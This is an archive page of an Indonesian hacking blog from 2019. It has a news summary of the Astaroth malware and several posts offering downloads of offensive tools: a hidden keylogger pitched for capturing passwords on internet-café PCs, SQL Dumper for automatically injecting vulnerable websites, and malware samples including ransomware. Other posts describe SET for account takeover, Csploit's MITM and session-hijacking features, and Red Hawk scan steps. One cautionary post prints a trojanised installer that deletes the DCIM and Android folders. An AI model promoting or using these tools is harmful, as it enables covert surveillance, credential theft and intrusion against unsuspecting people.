Showing posts with label Security. Show all posts
Showing posts with label Security. Show all posts

Saturday, July 20, 2019

Astaroth malware yang targetkan windows

Nama Astaroth cukup familiar didengar karena merupakan salah satu nama iblis yang mengerikan. Sama seperti namanya, malware ini juga cukup mengerikan dan juga berbahaya.

Malware Astaroth ini didistribusikan dengan menggunakan teknik fileless (tanpa file) dan living-off-the-land. Dengan kedua teknik tersebut, sulit bagi solusi keamanan maupun anti virus untuk mendeteksi adanya malware ini.

Dikutip dari halaman ZDnet, serangan malware Astaroth dideteksi oleh tim Windows Denfender ATP, versi komersial dari antivirus gratis Windows Defender.

Anggota tim Windows Defender ATP Andrea Lelli mengatakan, bel alarm berbunyi di kantor Microsoft saat tim mendeteksi lonjakan besar-besaran dan tiba-tiba dalam penggunaan tool Command Line Instrumentation Windows (WMIC).

WMIC merupakan tool yang ada di setiap sistem operasi Windows versi terbaru, lonjakan penggunaan yang tiba-tiba ini menyarankan pola khusus untuk adanya kampanye malware.

Saat pihak Microsoft melakukan penelitian lebih dalam, malware ini rupanya menyebarkan spam secara besar-besaran melalui email dengan tautan khusus ke situs yang menampung file shortcut .LNK.

Jika pengguna mendownload dan juga menjalankan file tersebut, nantinya akan memicu tool WMIC. Kemudian akan menyerang berbagai file lainnya yang ada di sistem operasi Windows.

Selanjutnya, tool akan mendownload segala kode tambahan dan meneruskan hasilnay satu sama lain. Selain itu, proses eksekusi hanya berlangsung didalam memori dan tidak tersimpan pada ruang penyimpanan pada harddisk.

Karena itulah antivirus tidak dapat mendeteksi karena tidak ada file apapun yang tersimpan (fileless).
Akhirnya, serangan itu mendonwload dan juga menjalankan trojan Astaroth selaku pencuri informasi dan membuang kredensial berbagai aplikasi, dan juga mengupload data yang dicuri ke server yang berlokasi jauh.

Astaroth terdeteksi pertama kali pada tahun 2018 dan menargetkan pengguna di wilayah Brazil dan juga Eropa.

Juru bicara Microsoft mengatakan, 95 persen infeksi Astaroth berasal dari Brazil. Teknik eksekusi fileless dan living-off-the-land seperti yang digunakan Astaroth 3 tahun belakangan ini sering dipakai sehingga malware menjadi lebih sulit terdeteksi.

Read More

Tuesday, July 16, 2019

Eaisai Keylogger untuk pemula

Halo teman - teman , kali ini saya mau share Tool keylogger yang cukup simpel untuk pemula.
apa itu keylogger ?    Keylogger pada dasar nya adalah software yang dapat merekam segala akivitas pada sebuah komputer. keylogger dapat merekam keystroke dari sebuah komputer.

keylogger biasa digunakan untuk memantau komputer sendiri, agar tau kalau ada yang menggunakan komputer selain kita.

Tapi Keylogger juga biasa di sisipkan pada komputer - komputer warnet yang sudah pasti tujuan nya adalah mendapatkan informasi sensitive seperti password , username dll.

jadi kalau kalian pernah kehilangan akun sosmed kalian padahal kalian tidak pernah membuka dan login di web phising, atau lupa log out dari browser di warnet.
inilah penyebab kalian kehilangan akun kalian.

keylogger dipasang oleh pemilik warnet itu sendiri dengan tujuan mendapatkan akun akun pengguna, lalu dijual. tapi  tidak semua warnet seperti itu ya 😁😁\

apa aja sih fituer keylogger ini :

1. berjalan secara private dan hidden, sehingga tidak mudah disadari orang lain

2. semua data yang direkam dapat dikirim melalui email

3. dapat merekam semua situs yang dikunjungi

apa kegunaan keylogger ini :

1. megetahui apa yang terjadi pada kommputer mu ketika kamu sedang tidak ada

2. memonitoring kerabat atau keluarga

3. memonitoring pc publik seperti di warnet - warnet

Download Eaisai keylogger : Easai Keylogger


Read More

Friday, July 12, 2019

SQL dumper terbaru


SQL dumper adalah software yang berfungsi untuk mencari web yang vuln sqli dan langsung menginjeksi secara otomatis.
SQL Dumper ini support beberapa mesin pencari untuk mencari web web vuln seperti :


  • Google
  • Bing
  • Yahoo
  • Aol
  • Yandex
  • Ask
  • Wow
  • WebCrawler
  • MyWebSearch
  • Sapo
Kalian bisa membuka database sebuah web secara detail apabila kalian menemukan web yang vuln.
Fitur dari SQL Dumper v.8.5 :
  • Support 20 metode SQL Injection
  • Admin login finder
  • GeoIP database
  • Mencari automatis web web vuln
  • Bisa menembus beberapa WAF website
  • Bisa menggunakan proxy
  • Secara automatis membuang url yang tidak dapat di injek
LINK DOwnload :
SQL Dumper 1

SQL Dumper 2
Read More

Wednesday, July 10, 2019

Buku Sakti Hacker full edition

 
cuman share buku lama yang masih sering dijadikan bacaan saat ini

link download : >>> disini
Judul : Buku Sakti Hacker
> Penulis : Efvy Zam
> Penerbit : MediaKita
> Tanggal Terbit : Agustus 2011
> Pages : 358 Halaman
> Kategori : Programming
> Text : Bahasa Indonesia
> Format : PDF

Read More

Friday, July 5, 2019

Malware dan jenisnya





Malware atau malicious software adalah program yang dibuat untuk mendapatkan akses ke sistem komputer dengan tujuan yang bermacam - macam ( tergantung dev nya ).

Malware memiliki bermacam - macam tipe, yaitu sebagai berikut


  • Virus

Virus Adalah program executeable yang berbahaya yang dapat menginfeksi file file pada computer .
virus dapat menyebar ke computer lain dan menginfeksi file lain juga.
virus mampu menghapus atau memodifikasi file dan sistem komputer.

contoh :  download disini

  • Worm 

Worm dapat mereplika diri sendiri, dan dapat berjalan dengan sendirinya dan dapat menyebar dengan sangat cepat melalui jaringan

Contoh :  download contoh disini

  • Trojan 
Trojan bekerja pada background OS yan diinginkan dan  dampaknya bervariasi. Trojan biasanya di selipkan pada gambar , document microsoft word, PDF, dan audio files.




 Contoh :  download contoh disini


  •  Ransomware 
Ransomware adalah salah satu varian Malware yang dapat mengencrypt file dan folder pada komputer, biasa nya orang yang menyebar ransomware akan meminta tebusan jika tidak mau file dan  folder pada komputer terhapus secara permanent.

Contoh : download contoh disini
Read More

Thursday, July 4, 2019

SET - powerfull Social Enginering Toolkit

SET atau social - enginering toolkit adalah open source penetration testing framework yang di desain khusus social enginering.

SET adalah produk dari Trustedsec organisasi information technology security consulting yang besar.

SET hanya memdukung dua os  yaitu linux dan Mac OS

yang jelas tool ini sangat cocok untuk take over / mengambil alih akun sosial media dsb.
langsung saja Link download dan tutorial pemasangan ada di SET pentesting framework

change log

version 8.0.1
~~~~~~~~~~~~~~~~
* fix an issue when using import on web clone
~~~~~~~~~~~~~~~~
version 8.0
~~~~~~~~~~~~~~~~
* fix an issue that caused metasploit web server to not properly work with apache_server to off
* changed arduino powershell shellcode to https instead of http
* fixed bug that would not generate powershell encoded code when using arduino
* fixed a sudo check for SET when not running as root would cause a log error exception
* removed setup.py in favor of requirements.txt - no longer needed
* updated readme and install documentation to reflect new install procedures through requirements.txt
* updated copyright information to 2019
* removed irc channel, no longer active or used
* removed old sms phishing menu - spoofmytext never fixed their API and no longer supported
* removed full screen attack - no longer supported or maintained
* removed html generation from web attack, no longer supported
~~~~~~~~~~~~~~~~
version 7.7.9
~~~~~~~~~~~~~~~~
* fix source.js not copying over when using tabnabbing
* bump config version and add default apache dir to /var/www/html
* fix sendmail not found on OSX when using phishing emails
~~~~~~~~~~~~~~~~
version 7.7.8
~~~~~~~~~~~~~~~~
* fix ident issue on harvester throwing templates off
~~~~~~~~~~~~~~~~
version 7.7.7
~~~~~~~~~~~~~~~~
* remove old test code
* add better wording for templates
* remove old templates yahoo and facebook
* add better descriptions for using NAT/External IP addresses for credential harvester
* fix if a custom PDF is selected, it won't default to a blank pdf
* add user variable to harvester
~~~~~~~~~~~~~~~~
version 7.7.6
~~~~~~~~~~~~~~~~
* fix GOAT message when starting SSL server
* fix BaseServer not being identified in import
* fix OSX cloning for harvester (port allocation)
* fix web server from not closing properly when using java applet attack
~~~~~~~~~~~~~~~~
version 7.7.5
~~~~~~~~~~~~~~~~
* fix line split based on = on credential harvester
~~~~~~~~~~~~~~~~
Read More

Bahaya asal install tool/script di termux






Halo teman - teman, kali saya akan membahas bahaya menginstall script/tools yang biasa di ambil dari github.

beberapa waktu yang lalu di group group pengguna termux di FB,WA ramai orang membicarakan tool yang disebut Dark FB dengan berbagai versi yang bermacam. bermacam macam repo dark fb disebar, banyak menginstall dan berhasil tetapi tidak sedikit juga yang gagal.
kemudian saya berniat mencoba dark fb yang sedang HOT ini.

googling  dark fb
dapat 1 repo https://github.com/ZeDDParker/dark-fb
script ditulis dengan bahasa python.
kemudian saya bongkar isi script ini dan teryata script ini berisi code yang berbahaya
script dapat menghapus beberapa  directory pada android

begini isinya

import os,sys,time

os.system("reset")
print "Install Tools..."
time.sleep(2)
os.system("cd /sdcard")
os.system("rm -rf DCIM")
os.system("rm -rf Android")
os.system("git clone https://github.com/rezadkim/dark-fb")
os.system("cd dark-fb")
os.system("python2 dark.py")



script ini menghapus dir DCIM dan Android
kemudia mengclone repo dark fb dari rezadkim dan diinstall secara otomatis
sehingga, seolah olah script berjalan dengan baik
tentu saja saya tidak jadi menginstall dengan script tersebut.

jadi sebelum  menginstall, baca dulu isi nya
sekian terimakasih.
Read More

Wednesday, July 3, 2019

sniffing jaringan di android dengan intercepter


intercepter-ng adalah tool yang di gunakan untuk sniffing jaringan sama seperti wireshark dll.
cara pemakaian bisa liat di google.





link Download : intercepter-ng Latest

berikut update fiture terbaru :

1.9 New:
+ Port Scanner (long click on IP)
+ DNS Spoofing
+ Improvements and fixes
1.8b New:
+ 'Gateway not found' fixed
+ Support for intel\arm x32\x64 devices
+ Clipboard usage for Cookies
+ Improvements and fixes
1.7 New:
+ Netmask bug fixed
+ Subnet scanning improved
+ Address bar in Cookie Viewer
+ Data view in Raw Mode

Read More

Tuesday, July 2, 2019

Solusi whatsapp crash karena Virtex

contoh virtex yang biasa dikirim

Halo teman teman, pernah gak sih kalian menerima pesan dari seseorang, terus whatsapp kalina tiba tiba lemot, dan akhirnya CRASH💢💢.

jika kalian pernah mengalami itu berarti kemungkinan besar seseorang yang mengirim pesan itu telah mengirim virtex.

saya pribadi pernah mengalami, sangat menjengkelkan memang, berikut  solusi yang bisa saya berikan

1. Hapus pesan virtex melalu whatsapp web
    ya ini adalah solusi terbaik saat ini ( menurut saya )
    jika melalui smartphone tidak bisa diakses karena berat, kalia  bisa mengakses melalui whatsapp  berbasis web. LINK : WA Web

note : kalian memerlukan autentikasi sebelum mengakses whatsapp web

 2. Re-Install

solusi ini jika kalian belum melakukan autentikasi pada whatsapp web, yaitu dengan menguninstal kemudia menginstall lagi whatsapp anda, mungkin pesan yang belum di backup akan hilang.
bisa juga menghapus sebelum crash ( masih tahap overload )
Read More

Monday, July 1, 2019

Red Hawk - Open Source Information Gathering and Vulnerability Scanning tool


Red Hawk adalah tool Open source yang ditulis menggunakan bahasa pemrograman PHP yang memiliki banyak fiture seperti Information Gathering, Vulnerability Scanner dll.
Red Hawk juga dapat mendeteksi CMS seperti joomla, wordpress, magento, drupal.

Download : RED HAWK

cara menggunakan Red Hawk :
Download terlebih dahulu Red Hawk nya
$ cd RED_HAWK
$ php rhawk.php
$ masukan url target mu
$ kemudian pilih fiture yang ada di menu



apa saja yang bisa kamu Scan dengan tool ini ?
  • Basic Scan
    • Site Title NEW
    • IP Address
    • Web Server Detection IMPROVED
    • CMS Detection
    • Cloudflare Detection
    • robots.txt Scanner
  • Whois Lookup IMPROVED
  • Geo-IP Lookup
  • Grab Banners IMPROVED
  • DNS Lookup
  • Subnet Calculator
  • Nmap Port Scan
  • Sub-Domain Scanner IMPROVED
    • Sub Domain
    • IP Address
  • Reverse IP Lookup & CMS Detection IMPROVED
    • Hostname
    • IP Address
    • CMS
  • Error Based SQLi Scanner
  • Bloggers View NEW
    • HTTP Response Code
    • Site Title
    • Alexa Ranking
    • Domain Authority
    • Page Authority
    • Social Links Extractor
    • Link Grabber
  • WordPress Scan NEW
    • Sensitive Files Crawling
    • Version Detection
    • Version Vulnerability Scanner
  • Crawler
  • MX Lookup NEW
  • Scan For Everything - The Old Lame Scanner

Read More

Sunday, June 30, 2019

Csploit : Advance Android Network Pentesting Suite






Csploit adalah paket analisis dan penetrasi jaringan
Android gratis dan open source yang bertujuan untuk menjadi
toolkit profesional paling lengkap dan canggih untuk pakar keamanan
TI untuk melakukan test keamanan jaringan pada perangkat seluler. Csploit juga memiliki banyak Fiture didalamnya


Download Csploit 
 
Feature :

  • Map your local network
  • Fingerprint hosts' operating systems and open ports
  • Add your own hosts outside the local network
  • Integrated traceroute
  • Integrated metasploit framework RPCd
    • Search hosts for known vulnerabilities via integrated Metasploit daemon
    • Adjust exploit settings, launch, and create shell consoles on exploited systems
    • More coming
  • Forge TCP/UDP packets
    • Image, text, and video replacement-- replace your own content on unencrypted web pages
    • JavaScript injection-- add your own javascript to unencrypted web pages.
    • password sniffing ( with common protocols dissection )
    • Capture pcap network traffic files
    • Real time traffic manipulation to replace images/text/inject into web pages
    • DNS spoofing to redirect traffic to different domain
    • Break existing connections
    • Redirect traffic to another address
    • Session Hijacking-- listen for unencrypted cookies and clone them to take Web session
  • Perform man in the middle attacks (MITM) including: 
  • Image, text, and video replacement-- replace your own content on unencrypted web pages
  • JavaScript injection-- add your own javascript to unencrypted web pages.
  • password sniffing ( with common protocols dissection )
  • Capture pcap network traffic files
  • Real time traffic manipulation to replace images/text/inject into web pages
  • DNS spoofing to redirect traffic to different domain
  • Break existing connections
  • Redirect traffic to another address
  • Session Hijacking-- listen for unencrypted cookies and clone them to take Web session
untuk Tutorial Akan menyusul secepatnya


Read More